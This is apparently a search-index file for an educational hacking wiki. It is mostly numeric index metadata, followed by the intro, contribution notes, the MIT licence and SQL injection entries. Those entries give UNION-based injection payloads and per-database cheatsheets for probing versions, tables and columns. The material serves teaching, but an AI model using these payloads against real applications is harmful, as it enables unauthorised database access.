rumbs":7,"title":1},"322":{"body":56,"breadcrumbs":8,"title":1},"323":{"body":42,"breadcrumbs":8,"title":1},"324":{"body":65,"breadcrumbs":10,"title":3},"325":{"body":68,"breadcrumbs":10,"title":3},"326":{"body":28,"breadcrumbs":9,"title":1},"327":{"body":68,"breadcrumbs":10,"title":2},"328":{"body":27,"breadcrumbs":10,"title":2},"329":{"body":17,"breadcrumbs":9,"title":1},"33":{"body":13,"breadcrumbs":9,"title":4},"330":{"body":17,"breadcrumbs":11,"title":3},"331":{"body":21,"breadcrumbs":11,"title":3},"332":{"body":171,"breadcrumbs":11,"title":3},"333":{"body":52,"breadcrumbs":8,"title":1},"334":{"body":82,"breadcrumbs":9,"title":2},"335":{"body":168,"breadcrumbs":8,"title":1},"336":{"body":17,"breadcrumbs":9,"title":2},"337":{"body":18,"breadcrumbs":10,"title":3},"338":{"body":46,"breadcrumbs":10,"title":3},"339":{"body":22,"breadcrumbs":10,"title":3},"34":{"body":19,"breadcrumbs":9,"title":4},"340":{"body":210,"breadcrumbs":10,"title":3},"341":{"body":35,"breadcrumbs":11,"title":4},"342":{"body":22,"breadcrumbs":9,"title":1},"343":{"body":66,"breadcrumbs":10,"title":2},"344":{"body":0,"breadcrumbs":4,"title":2},"345":{"body":43,"breadcrumbs":6,"title":1},"346":{"body":74,"breadcrumbs":6,"title":1},"347":{"body":45,"breadcrumbs":7,"title":1},"348":{"body":102,"breadcrumbs":8,"title":2},"349":{"body":76,"breadcrumbs":8,"title":1},"35":{"body":73,"breadcrumbs":9,"title":1},"350":{"body":110,"breadcrumbs":10,"title":3},"351":{"body":583,"breadcrumbs":9,"title":2},"352":{"body":65,"breadcrumbs":7,"title":1},"353":{"body":263,"breadcrumbs":9,"title":3},"354":{"body":174,"breadcrumbs":8,"title":2},"355":{"body":115,"breadcrumbs":8,"title":1},"356":{"body":168,"breadcrumbs":8,"title":1},"357":{"body":124,"breadcrumbs":8,"title":1},"358":{"body":32,"breadcrumbs":6,"title":1},"359":{"body":22,"breadcrumbs":6,"title":1},"36":{"body":26,"breadcrumbs":12,"title":4},"360":{"body":74,"breadcrumbs":7,"title":2},"361":{"body":24,"breadcrumbs":7,"title":1},"362":{"body":288,"brea
dcrumbs":8,"title":2},"363":{"body":262,"breadcrumbs":9,"title":3},"364":{"body":97,"breadcrumbs":8,"title":2},"365":{"body":275,"breadcrumbs":7,"title":1},"366":{"body":70,"breadcrumbs":7,"title":1},"367":{"body":588,"breadcrumbs":10,"title":4},"368":{"body":0,"breadcrumbs":8,"title":2},"369":{"body":13,"breadcrumbs":7,"title":1},"37":{"body":39,"breadcrumbs":10,"title":2},"370":{"body":10,"breadcrumbs":7,"title":1},"371":{"body":37,"breadcrumbs":8,"title":2},"372":{"body":9,"breadcrumbs":7,"title":1},"373":{"body":14,"breadcrumbs":8,"title":2},"374":{"body":10,"breadcrumbs":7,"title":1},"375":{"body":12,"breadcrumbs":7,"title":1},"376":{"body":4,"breadcrumbs":7,"title":1},"377":{"body":18,"breadcrumbs":7,"title":1},"378":{"body":22,"breadcrumbs":9,"title":3},"379":{"body":28,"breadcrumbs":7,"title":1},"38":{"body":39,"breadcrumbs":10,"title":2},"380":{"body":19,"breadcrumbs":7,"title":1},"381":{"body":30,"breadcrumbs":6,"title":0},"382":{"body":401,"breadcrumbs":8,"title":2},"383":{"body":95,"breadcrumbs":8,"title":2},"384":{"body":30,"breadcrumbs":7,"title":1},"385":{"body":167,"breadcrumbs":9,"title":3},"386":{"body":26,"breadcrumbs":8,"title":2},"387":{"body":50,"breadcrumbs":7,"title":1},"388":{"body":68,"breadcrumbs":7,"title":1},"389":{"body":22,"breadcrumbs":7,"title":1},"39":{"body":79,"breadcrumbs":3,"title":1},"390":{"body":19,"breadcrumbs":7,"title":1},"391":{"body":22,"breadcrumbs":7,"title":1},"392":{"body":75,"breadcrumbs":7,"title":1},"393":{"body":15,"breadcrumbs":7,"title":1},"394":{"body":77,"breadcrumbs":8,"title":2},"395":{"body":780,"breadcrumbs":8,"title":1},"396":{"body":314,"breadcrumbs":9,"title":2},"397":{"body":56,"breadcrumbs":8,"title":1},"398":{"body":311,"breadcrumbs":8,"title":1},"399":{"body":101,"breadcrumbs":8,"title":1},"4":{"body":77,"breadcrumbs":3,"title":1},"40":{"body":0,"breadcrumbs":3,"title":1},"400":{"body":0,"breadcrumbs":9,"title":1},"401":{"body":34,"breadcrumbs":4,"title":1},"402":{"body":22,"breadcrumbs":7,"title":
4},"403":{"body":15,"breadcrumbs":4,"title":1},"404":{"body":36,"breadcrumbs":4,"title":1},"405":{"body":49,"breadcrumbs":12,"title":3},"406":{"body":29,"breadcrumbs":12,"title":3},"407":{"body":31,"breadcrumbs":13,"title":4},"408":{"body":0,"breadcrumbs":2,"title":2},"409":{"body":16,"breadcrumbs":5,"title":1},"41":{"body":37,"breadcrumbs":5,"title":1},"410":{"body":146,"breadcrumbs":6,"title":2},"411":{"body":489,"breadcrumbs":7,"title":3},"412":{"body":23,"breadcrumbs":8,"title":1},"413":{"body":115,"breadcrumbs":9,"title":2},"414":{"body":142,"breadcrumbs":7,"title":1},"415":{"body":133,"breadcrumbs":8,"title":1},"416":{"body":94,"breadcrumbs":9,"title":2},"417":{"body":264,"breadcrumbs":10,"title":3},"418":{"body":106,"breadcrumbs":10,"title":3},"419":{"body":24,"breadcrumbs":9,"title":2},"42":{"body":61,"breadcrumbs":7,"title":3},"420":{"body":123,"breadcrumbs":2,"title":1},"421":{"body":74,"breadcrumbs":3,"title":2},"422":{"body":66,"breadcrumbs":3,"title":2},"423":{"body":363,"breadcrumbs":3,"title":2},"424":{"body":83,"breadcrumbs":2,"title":1},"425":{"body":210,"breadcrumbs":4,"title":1},"426":{"body":53,"breadcrumbs":6,"title":1},"427":{"body":250,"breadcrumbs":7,"title":2},"428":{"body":102,"breadcrumbs":8,"title":3},"429":{"body":168,"breadcrumbs":9,"title":4},"43":{"body":11,"breadcrumbs":7,"title":2},"430":{"body":54,"breadcrumbs":7,"title":1},"431":{"body":291,"breadcrumbs":9,"title":3},"432":{"body":192,"breadcrumbs":10,"title":4},"433":{"body":141,"breadcrumbs":9,"title":3},"434":{"body":263,"breadcrumbs":7,"title":1},"435":{"body":48,"breadcrumbs":6,"title":1},"436":{"body":118,"breadcrumbs":8,"title":3},"437":{"body":99,"breadcrumbs":8,"title":3},"438":{"body":125,"breadcrumbs":7,"title":2},"439":{"body":40,"breadcrumbs":5,"title":1},"44":{"body":159,"breadcrumbs":6,"title":1},"440":{"body":269,"breadcrumbs":7,"title":3},"441":{"body":0,"breadcrumbs":6,"title":1},"442":{"body":0,"breadcrumbs":9,"title":1},"443":{"body":175,"breadcrumbs":11,"title
":1},"444":{"body":6,"breadcrumbs":8,"title":2},"445":{"body":40,"breadcrumbs":8,"title":2},"446":{"body":25,"breadcrumbs":8,"title":2},"447":{"body":53,"breadcrumbs":8,"title":2},"448":{"body":47,"breadcrumbs":7,"title":1},"449":{"body":116,"breadcrumbs":10,"title":4},"45":{"body":55,"breadcrumbs":6,"title":1},"450":{"body":66,"breadcrumbs":8,"title":2},"451":{"body":0,"breadcrumbs":17,"title":11},"452":{"body":64,"breadcrumbs":8,"title":2},"453":{"body":79,"breadcrumbs":3,"title":1},"454":{"body":101,"breadcrumbs":7,"title":2},"455":{"body":180,"breadcrumbs":9,"title":4},"456":{"body":125,"breadcrumbs":9,"title":4},"457":{"body":198,"breadcrumbs":6,"title":1},"458":{"body":207,"breadcrumbs":8,"title":3},"459":{"body":640,"breadcrumbs":7,"title":2},"46":{"body":0,"breadcrumbs":6,"title":1},"460":{"body":445,"breadcrumbs":8,"title":2},"461":{"body":146,"breadcrumbs":10,"title":4},"462":{"body":193,"breadcrumbs":8,"title":2},"463":{"body":239,"breadcrumbs":5,"title":1},"464":{"body":140,"breadcrumbs":7,"title":1},"465":{"body":69,"breadcrumbs":8,"title":2},"466":{"body":104,"breadcrumbs":7,"title":1},"467":{"body":29,"breadcrumbs":11,"title":1},"468":{"body":131,"breadcrumbs":13,"title":3},"469":{"body":240,"breadcrumbs":15,"title":5},"47":{"body":71,"breadcrumbs":6,"title":1},"470":{"body":81,"breadcrumbs":12,"title":2},"471":{"body":59,"breadcrumbs":12,"title":2},"472":{"body":0,"breadcrumbs":12,"title":1},"473":{"body":41,"breadcrumbs":7,"title":1},"474":{"body":116,"breadcrumbs":8,"title":2},"475":{"body":22,"breadcrumbs":10,"title":1},"476":{"body":394,"breadcrumbs":12,"title":1},"477":{"body":164,"breadcrumbs":14,"title":3},"478":{"body":39,"breadcrumbs":12,"title":1},"479":{"body":334,"breadcrumbs":13,"title":2},"48":{"body":148,"breadcrumbs":13,"title":8},"480":{"body":352,"breadcrumbs":13,"title":2},"481":{"body":93,"breadcrumbs":14,"title":4},"482":{"body":265,"breadcrumbs":12,"title":2},"483":{"body":269,"breadcrumbs":12,"title":2},"484":{"body":94,"breadc
rumbs":8,"title":1},"485":{"body":191,"breadcrumbs":9,"title":2},"486":{"body":47,"breadcrumbs":9,"title":2},"487":{"body":128,"breadcrumbs":8,"title":1},"488":{"body":311,"breadcrumbs":9,"title":2},"489":{"body":126,"breadcrumbs":11,"title":1},"49":{"body":75,"breadcrumbs":9,"title":4},"490":{"body":68,"breadcrumbs":14,"title":4},"491":{"body":174,"breadcrumbs":12,"title":2},"492":{"body":18,"breadcrumbs":12,"title":2},"493":{"body":296,"breadcrumbs":10,"title":1},"494":{"body":78,"breadcrumbs":12,"title":3},"495":{"body":78,"breadcrumbs":7,"title":1},"496":{"body":159,"breadcrumbs":7,"title":1},"497":{"body":114,"breadcrumbs":9,"title":1},"498":{"body":170,"breadcrumbs":14,"title":3},"499":{"body":146,"breadcrumbs":14,"title":3},"5":{"body":6,"breadcrumbs":3,"title":1},"50":{"body":323,"breadcrumbs":9,"title":4},"500":{"body":91,"breadcrumbs":14,"title":3},"501":{"body":174,"breadcrumbs":18,"title":5},"502":{"body":230,"breadcrumbs":16,"title":3},"503":{"body":33,"breadcrumbs":16,"title":3},"504":{"body":54,"breadcrumbs":13,"title":1},"505":{"body":64,"breadcrumbs":15,"title":3},"506":{"body":131,"breadcrumbs":11,"title":1},"507":{"body":25,"breadcrumbs":12,"title":2},"508":{"body":65,"breadcrumbs":11,"title":1},"509":{"body":89,"breadcrumbs":12,"title":2},"51":{"body":110,"breadcrumbs":12,"title":7},"510":{"body":9,"breadcrumbs":11,"title":1},"511":{"body":40,"breadcrumbs":11,"title":1},"512":{"body":38,"breadcrumbs":11,"title":1},"513":{"body":64,"breadcrumbs":10,"title":1},"514":{"body":217,"breadcrumbs":10,"title":1},"515":{"body":117,"breadcrumbs":13,"title":4},"516":{"body":152,"breadcrumbs":13,"title":4},"517":{"body":25,"breadcrumbs":11,"title":1},"518":{"body":184,"breadcrumbs":12,"title":2},"519":{"body":80,"breadcrumbs":12,"title":2},"52":{"body":6,"breadcrumbs":6,"title":1},"520":{"body":96,"breadcrumbs":9,"title":1},"521":{"body":229,"breadcrumbs":11,"title":3},"522":{"body":253,"breadcrumbs":9,"title":1},"523":{"body":85,"breadcrumbs":10,"title":2},"
524":{"body":93,"breadcrumbs":10,"title":2},"525":{"body":132,"breadcrumbs":16,"title":4},"526":{"body":49,"breadcrumbs":14,"title":2},"527":{"body":266,"breadcrumbs":14,"title":3},"528":{"body":362,"breadcrumbs":15,"title":4},"529":{"body":50,"breadcrumbs":8,"title":1},"53":{"body":0,"breadcrumbs":5,"title":1},"530":{"body":167,"breadcrumbs":10,"title":3},"531":{"body":190,"breadcrumbs":11,"title":4},"532":{"body":70,"breadcrumbs":9,"title":2},"533":{"body":1,"breadcrumbs":14,"title":1},"534":{"body":15,"breadcrumbs":14,"title":1},"535":{"body":181,"breadcrumbs":7,"title":1},"536":{"body":11,"breadcrumbs":7,"title":1},"537":{"body":56,"breadcrumbs":9,"title":3},"538":{"body":152,"breadcrumbs":8,"title":2},"539":{"body":91,"breadcrumbs":8,"title":2},"54":{"body":40,"breadcrumbs":5,"title":1},"540":{"body":326,"breadcrumbs":8,"title":2},"541":{"body":123,"breadcrumbs":8,"title":1},"542":{"body":28,"breadcrumbs":11,"title":4},"543":{"body":0,"breadcrumbs":3,"title":1},"544":{"body":94,"breadcrumbs":6,"title":1},"545":{"body":157,"breadcrumbs":7,"title":2},"546":{"body":0,"breadcrumbs":3,"title":1},"547":{"body":0,"breadcrumbs":5,"title":1},"548":{"body":50,"breadcrumbs":8,"title":1},"549":{"body":27,"breadcrumbs":10,"title":1},"55":{"body":70,"breadcrumbs":7,"title":3},"550":{"body":187,"breadcrumbs":13,"title":4},"551":{"body":280,"breadcrumbs":12,"title":3},"552":{"body":298,"breadcrumbs":6,"title":2},"553":{"body":351,"breadcrumbs":6,"title":2},"554":{"body":229,"breadcrumbs":4,"title":1},"555":{"body":51,"breadcrumbs":5,"title":2},"556":{"body":50,"breadcrumbs":5,"title":2},"557":{"body":74,"breadcrumbs":4,"title":1},"558":{"body":97,"breadcrumbs":4,"title":1},"559":{"body":272,"breadcrumbs":5,"title":2},"56":{"body":48,"breadcrumbs":7,"title":3},"560":{"body":22,"breadcrumbs":5,"title":2},"561":{"body":23,"breadcrumbs":4,"title":1},"562":{"body":30,"breadcrumbs":4,"title":1},"563":{"body":29,"breadcrumbs":4,"title":1},"564":{"body":117,"breadcrumbs":4,"title":1},
"565":{"body":111,"breadcrumbs":5,"title":2},"566":{"body":207,"breadcrumbs":4,"title":1},"567":{"body":82,"breadcrumbs":4,"title":1},"568":{"body":39,"breadcrumbs":5,"title":2},"569":{"body":79,"breadcrumbs":5,"title":2},"57":{"body":77,"breadcrumbs":5,"title":1},"570":{"body":174,"breadcrumbs":5,"title":2},"571":{"body":176,"breadcrumbs":4,"title":1},"572":{"body":178,"breadcrumbs":5,"title":1},"573":{"body":167,"breadcrumbs":6,"title":2},"574":{"body":352,"breadcrumbs":7,"title":3},"575":{"body":89,"breadcrumbs":7,"title":3},"576":{"body":0,"breadcrumbs":6,"title":2},"577":{"body":8,"breadcrumbs":2,"title":1},"578":{"body":0,"breadcrumbs":3,"title":1},"579":{"body":0,"breadcrumbs":5,"title":1},"58":{"body":127,"breadcrumbs":6,"title":2},"580":{"body":23,"breadcrumbs":10,"title":1},"581":{"body":69,"breadcrumbs":11,"title":2},"582":{"body":94,"breadcrumbs":13,"title":4},"583":{"body":131,"breadcrumbs":12,"title":3},"584":{"body":51,"breadcrumbs":11,"title":1},"585":{"body":45,"breadcrumbs":12,"title":2},"586":{"body":159,"breadcrumbs":12,"title":2},"587":{"body":38,"breadcrumbs":13,"title":3},"588":{"body":39,"breadcrumbs":13,"title":3},"589":{"body":75,"breadcrumbs":13,"title":3},"59":{"body":0,"breadcrumbs":2,"title":1},"590":{"body":44,"breadcrumbs":12,"title":1},"591":{"body":207,"breadcrumbs":12,"title":1},"592":{"body":46,"breadcrumbs":13,"title":2},"593":{"body":74,"breadcrumbs":12,"title":1},"594":{"body":35,"breadcrumbs":15,"title":1},"595":{"body":19,"breadcrumbs":17,"title":3},"596":{"body":28,"breadcrumbs":12,"title":1},"597":{"body":28,"breadcrumbs":13,"title":2},"598":{"body":31,"breadcrumbs":12,"title":1},"599":{"body":25,"breadcrumbs":15,"title":4},"6":{"body":51,"breadcrumbs":4,"title":2},"60":{"body":0,"breadcrumbs":5,"title":2},"600":{"body":70,"breadcrumbs":20,"title":9},"601":{"body":32,"breadcrumbs":14,"title":3},"602":{"body":109,"breadcrumbs":13,"title":2},"603":{"body":75,"breadcrumbs":14,"title":3},"604":{"body":49,"breadcrumbs":12,"title
":1},"605":{"body":41,"breadcrumbs":13,"title":2},"606":{"body":24,"breadcrumbs":14,"title":3},"607":{"body":258,"breadcrumbs":12,"title":1},"608":{"body":16,"breadcrumbs":12,"title":1},"609":{"body":106,"breadcrumbs":12,"title":1},"61":{"body":70,"breadcrumbs":7,"title":2},"610":{"body":333,"breadcrumbs":13,"title":2},"611":{"body":100,"breadcrumbs":13,"title":2},"612":{"body":0,"breadcrumbs":9,"title":1},"613":{"body":24,"breadcrumbs":6,"title":1},"614":{"body":258,"breadcrumbs":7,"title":2},"615":{"body":96,"breadcrumbs":7,"title":2},"616":{"body":40,"breadcrumbs":10,"title":5},"617":{"body":39,"breadcrumbs":7,"title":2},"618":{"body":247,"breadcrumbs":7,"title":2},"619":{"body":8,"breadcrumbs":7,"title":2},"62":{"body":65,"breadcrumbs":9,"title":1},"620":{"body":8,"breadcrumbs":9,"title":4},"621":{"body":125,"breadcrumbs":8,"title":1},"622":{"body":9,"breadcrumbs":10,"title":3},"623":{"body":219,"breadcrumbs":9,"title":2},"624":{"body":20,"breadcrumbs":10,"title":3},"625":{"body":30,"breadcrumbs":10,"title":3},"626":{"body":152,"breadcrumbs":11,"title":4},"627":{"body":29,"breadcrumbs":8,"title":1},"628":{"body":70,"breadcrumbs":12,"title":5},"629":{"body":256,"breadcrumbs":11,"title":4},"63":{"body":365,"breadcrumbs":9,"title":1},"630":{"body":51,"breadcrumbs":12,"title":5},"631":{"body":81,"breadcrumbs":9,"title":2},"632":{"body":18,"breadcrumbs":13,"title":6},"633":{"body":43,"breadcrumbs":9,"title":2},"634":{"body":144,"breadcrumbs":9,"title":2},"635":{"body":88,"breadcrumbs":8,"title":1},"636":{"body":74,"breadcrumbs":9,"title":2},"637":{"body":9,"breadcrumbs":9,"title":2},"638":{"body":36,"breadcrumbs":9,"title":2},"639":{"body":43,"breadcrumbs":9,"title":2},"64":{"body":20,"breadcrumbs":7,"title":2},"640":{"body":75,"breadcrumbs":10,"title":3},"641":{"body":75,"breadcrumbs":8,"title":1},"642":{"body":0,"breadcrumbs":9,"title":1},"643":{"body":36,"breadcrumbs":10,"title":1},"644":{"body":0,"breadcrumbs":14,"title":5},"645":{"body":30,"breadcrumbs":11,"titl
e":2},"646":{"body":120,"breadcrumbs":11,"title":2},"647":{"body":205,"breadcrumbs":11,"title":2},"648":{"body":184,"breadcrumbs":11,"title":2},"649":{"body":9,"breadcrumbs":11,"title":2},"65":{"body":163,"breadcrumbs":9,"title":1},"650":{"body":76,"breadcrumbs":11,"title":2},"651":{"body":63,"breadcrumbs":10,"title":1},"652":{"body":116,"breadcrumbs":11,"title":2},"653":{"body":50,"breadcrumbs":11,"title":2},"654":{"body":48,"breadcrumbs":10,"title":1},"655":{"body":15,"breadcrumbs":14,"title":5},"656":{"body":0,"breadcrumbs":11,"title":2},"657":{"body":40,"breadcrumbs":10,"title":1},"658":{"body":32,"breadcrumbs":11,"title":2},"659":{"body":0,"breadcrumbs":11,"title":2},"66":{"body":64,"breadcrumbs":12,"title":4},"660":{"body":148,"breadcrumbs":14,"title":5},"661":{"body":22,"breadcrumbs":12,"title":3},"662":{"body":320,"breadcrumbs":11,"title":2},"663":{"body":116,"breadcrumbs":12,"title":3},"664":{"body":29,"breadcrumbs":12,"title":3},"665":{"body":24,"breadcrumbs":11,"title":2},"666":{"body":357,"breadcrumbs":12,"title":3},"667":{"body":0,"breadcrumbs":7,"title":1},"668":{"body":0,"breadcrumbs":7,"title":1},"669":{"body":41,"breadcrumbs":8,"title":1},"67":{"body":160,"breadcrumbs":10,"title":2},"670":{"body":11,"breadcrumbs":8,"title":1},"671":{"body":31,"breadcrumbs":9,"title":2},"672":{"body":52,"breadcrumbs":10,"title":3},"673":{"body":75,"breadcrumbs":11,"title":4},"674":{"body":48,"breadcrumbs":10,"title":3},"675":{"body":27,"breadcrumbs":15,"title":8},"676":{"body":36,"breadcrumbs":10,"title":3},"677":{"body":40,"breadcrumbs":13,"title":6},"678":{"body":128,"breadcrumbs":10,"title":1},"679":{"body":15,"breadcrumbs":8,"title":1},"68":{"body":411,"breadcrumbs":11,"title":3},"680":{"body":40,"breadcrumbs":10,"title":3},"681":{"body":0,"breadcrumbs":9,"title":2},"682":{"body":76,"breadcrumbs":11,"title":4},"683":{"body":86,"breadcrumbs":12,"title":5},"684":{"body":36,"breadcrumbs":12,"title":5},"685":{"body":24,"breadcrumbs":12,"title":5},"686":{"body":0,"bre
adcrumbs":7,"title":1},"687":{"body":68,"breadcrumbs":8,"title":1},"688":{"body":46,"breadcrumbs":10,"title":1},"689":{"body":43,"breadcrumbs":10,"title":1},"69":{"body":103,"breadcrumbs":9,"title":2},"690":{"body":89,"breadcrumbs":11,"title":2},"691":{"body":159,"breadcrumbs":13,"title":4},"692":{"body":82,"breadcrumbs":11,"title":2},"693":{"body":135,"breadcrumbs":12,"title":3},"694":{"body":0,"breadcrumbs":8,"title":1},"695":{"body":24,"breadcrumbs":8,"title":1},"696":{"body":26,"breadcrumbs":8,"title":1},"697":{"body":38,"breadcrumbs":8,"title":1},"698":{"body":26,"breadcrumbs":11,"title":4},"699":{"body":32,"breadcrumbs":10,"title":3},"7":{"body":69,"breadcrumbs":4,"title":2},"70":{"body":5,"breadcrumbs":9,"title":2},"700":{"body":13,"breadcrumbs":8,"title":1},"701":{"body":10,"breadcrumbs":9,"title":2},"702":{"body":28,"breadcrumbs":9,"title":2},"703":{"body":29,"breadcrumbs":9,"title":2},"704":{"body":59,"breadcrumbs":8,"title":1},"705":{"body":49,"breadcrumbs":9,"title":2},"706":{"body":68,"breadcrumbs":8,"title":1},"707":{"body":118,"breadcrumbs":14,"title":7},"708":{"body":49,"breadcrumbs":9,"title":2},"709":{"body":22,"breadcrumbs":9,"title":2},"71":{"body":128,"breadcrumbs":9,"title":2},"710":{"body":85,"breadcrumbs":9,"title":2},"711":{"body":39,"breadcrumbs":6,"title":1},"712":{"body":45,"breadcrumbs":7,"title":1},"713":{"body":85,"breadcrumbs":8,"title":2},"714":{"body":43,"breadcrumbs":10,"title":4},"715":{"body":28,"breadcrumbs":7,"title":1},"716":{"body":207,"breadcrumbs":8,"title":2},"717":{"body":63,"breadcrumbs":7,"title":1},"718":{"body":40,"breadcrumbs":8,"title":2},"719":{"body":45,"breadcrumbs":9,"title":3},"72":{"body":21,"breadcrumbs":9,"title":2},"720":{"body":41,"breadcrumbs":10,"title":4},"721":{"body":35,"breadcrumbs":9,"title":3},"722":{"body":101,"breadcrumbs":8,"title":2},"723":{"body":48,"breadcrumbs":8,"title":2},"724":{"body":37,"breadcrumbs":8,"title":2},"725":{"body":68,"breadcrumbs":9,"title":3},"726":{"body":15,"breadcrumbs":
9,"title":3},"727":{"body":374,"breadcrumbs":7,"title":1},"728":{"body":170,"breadcrumbs":7,"title":1},"729":{"body":65,"breadcrumbs":7,"title":1},"73":{"body":24,"breadcrumbs":8,"title":1},"730":{"body":83,"breadcrumbs":8,"title":2},"731":{"body":178,"breadcrumbs":9,"title":3},"732":{"body":0,"breadcrumbs":8,"title":2},"733":{"body":182,"breadcrumbs":6,"title":1},"734":{"body":212,"breadcrumbs":8,"title":3},"735":{"body":108,"breadcrumbs":7,"title":2},"736":{"body":17,"breadcrumbs":3,"title":1},"737":{"body":0,"breadcrumbs":4,"title":2},"738":{"body":0,"breadcrumbs":3,"title":1},"739":{"body":83,"breadcrumbs":8,"title":2},"74":{"body":182,"breadcrumbs":8,"title":1},"740":{"body":31,"breadcrumbs":8,"title":2},"741":{"body":26,"breadcrumbs":8,"title":2},"742":{"body":23,"breadcrumbs":8,"title":2},"743":{"body":26,"breadcrumbs":8,"title":2},"744":{"body":33,"breadcrumbs":8,"title":2},"745":{"body":24,"breadcrumbs":9,"title":3},"746":{"body":22,"breadcrumbs":8,"title":2},"747":{"body":55,"breadcrumbs":8,"title":2},"748":{"body":50,"breadcrumbs":10,"title":1},"749":{"body":0,"breadcrumbs":10,"title":1},"75":{"body":203,"breadcrumbs":8,"title":1},"750":{"body":284,"breadcrumbs":12,"title":3},"751":{"body":187,"breadcrumbs":12,"title":3},"752":{"body":265,"breadcrumbs":11,"title":2},"753":{"body":38,"breadcrumbs":11,"title":2},"754":{"body":30,"breadcrumbs":14,"title":5},"755":{"body":64,"breadcrumbs":13,"title":4},"756":{"body":51,"breadcrumbs":13,"title":4},"757":{"body":52,"breadcrumbs":14,"title":5},"758":{"body":56,"breadcrumbs":11,"title":2},"759":{"body":0,"breadcrumbs":12,"title":3},"76":{"body":66,"breadcrumbs":10,"title":1},"760":{"body":30,"breadcrumbs":11,"title":2},"761":{"body":13,"breadcrumbs":11,"title":2},"762":{"body":16,"breadcrumbs":11,"title":2},"763":{"body":34,"breadcrumbs":10,"title":1},"764":{"body":79,"breadcrumbs":11,"title":2},"765":{"body":0,"breadcrumbs":8,"title":3},"766":{"body":306,"breadcrumbs":3,"title":1},"767":{"body":194,"breadcrumbs"
:3,"title":1},"768":{"body":123,"breadcrumbs":4,"title":2},"769":{"body":150,"breadcrumbs":4,"title":2},"77":{"body":28,"breadcrumbs":10,"title":1},"78":{"body":130,"breadcrumbs":10,"title":1},"79":{"body":28,"breadcrumbs":11,"title":2},"8":{"body":63,"breadcrumbs":3,"title":1},"80":{"body":16,"breadcrumbs":12,"title":3},"81":{"body":30,"breadcrumbs":10,"title":1},"82":{"body":87,"breadcrumbs":13,"title":4},"83":{"body":23,"breadcrumbs":11,"title":2},"84":{"body":477,"breadcrumbs":10,"title":1},"85":{"body":116,"breadcrumbs":8,"title":1},"86":{"body":123,"breadcrumbs":10,"title":3},"87":{"body":142,"breadcrumbs":13,"title":6},"88":{"body":12,"breadcrumbs":10,"title":3},"89":{"body":4,"breadcrumbs":8,"title":1},"9":{"body":16,"breadcrumbs":3,"title":1},"90":{"body":42,"breadcrumbs":9,"title":2},"91":{"body":0,"breadcrumbs":3,"title":1},"92":{"body":0,"breadcrumbs":6,"title":2},"93":{"body":35,"breadcrumbs":7,"title":1},"94":{"body":21,"breadcrumbs":8,"title":3},"95":{"body":7,"breadcrumbs":8,"title":3},"96":{"body":7,"breadcrumbs":8,"title":3},"97":{"body":62,"breadcrumbs":6,"title":1},"98":{"body":95,"breadcrumbs":7,"title":2},"99":{"body":49,"breadcrumbs":7,"title":1}},"docs":{"0":{"body":"The Cyberclopaedia This is an aspiring project aimed at accumulating knowledge from the world of cybersecurity and presenting it in a cogent way, so it is accessible to as large an audience as possible and so that everyone has a good resource to learn hacking from. Warning The information here is for educational purposes only.","breadcrumbs":"Cyberclopaedia","id":"0","title":"Cyberclopaedia"},"1":{"body":"The Cyberclopaedia is open to contribution from everyone via pull requests on the Cyberclopaedia GitHub repository . 
When contributing new content, please ensure that it is as relevant as possible, contains detailed (and yet tractable) explanations and is accompanied by diagrams where appropriate.","breadcrumbs":"Cyberclopaedia » Contributing » Overview","id":"1","title":"Overview"},"10":{"body":"MIT License Copyright (c) 2023 Cyberclopaedia Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.","breadcrumbs":"Cyberclopaedia » License","id":"10","title":"Cyberclopaedia"},"100":{"body":"In a union injection, the number of columns in the injected query must match the number of columns in the original query. 
You can determine the number of columns by using the following query and keep appending NULLs until you observe a change in behaviour: UNION SELECT NULL-- UNION SELECT NULL, NULL -- And so on.","breadcrumbs":"Exploitation » Web » SQL Injection » Union injections » Determining the amount of columns returned","id":"100","title":"Determining the amount of columns returned"},"101":{"body":"Once you have determined the amount of columns, you can look for columns that contain entries of a specific type. Suppose the original query has 3 columns. UNION SELECT NULL, NULL, NULL -- You can start replacing the NULLs one by one with a random string of text enclosed in quotation marks until you observe a change in behaviour: UNION SELECT 'random text', NULL, NULL -- UNION SELECT NULL, 'random text', NULL -- And so on.","breadcrumbs":"Exploitation » Web » SQL Injection » Union injections » Searching for columns which return entries of a particular type","id":"101","title":"Searching for columns which return entries of a particular type"},"102":{"body":"Database engines provide tables with the database's metadata. 
This metadata table is different for the different engines: Engine Table Name SQLite sqlite_master MySQL information_schema PostgreSQL information_schema Oracle dba_tables","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Metadata","id":"102","title":"Database Metadata"},"103":{"body":"Database Version Info Oracle SELECT banner FROM v$version SELECT version FROM v$instance Microsoft SELECT @@version PostgreSQL SELECT version() MySQL SELECT @@version","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Version","id":"103","title":"Database Version"},"104":{"body":"Listing tables and the columns they contain: Database Contents Info Oracle SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'Table Name' Microsoft SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' PostgreSQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' MySQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Database Contents","id":"104","title":"Database Contents"},"105":{"body":"Database Concatenation Oracle 'a'||'b' Microsoft 'a'+'b' PostgreSQL 'a'||'b' MySQL 'a' 'b' (space) or CONCAT('a','b')","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » String Concatenation","id":"105","title":"String 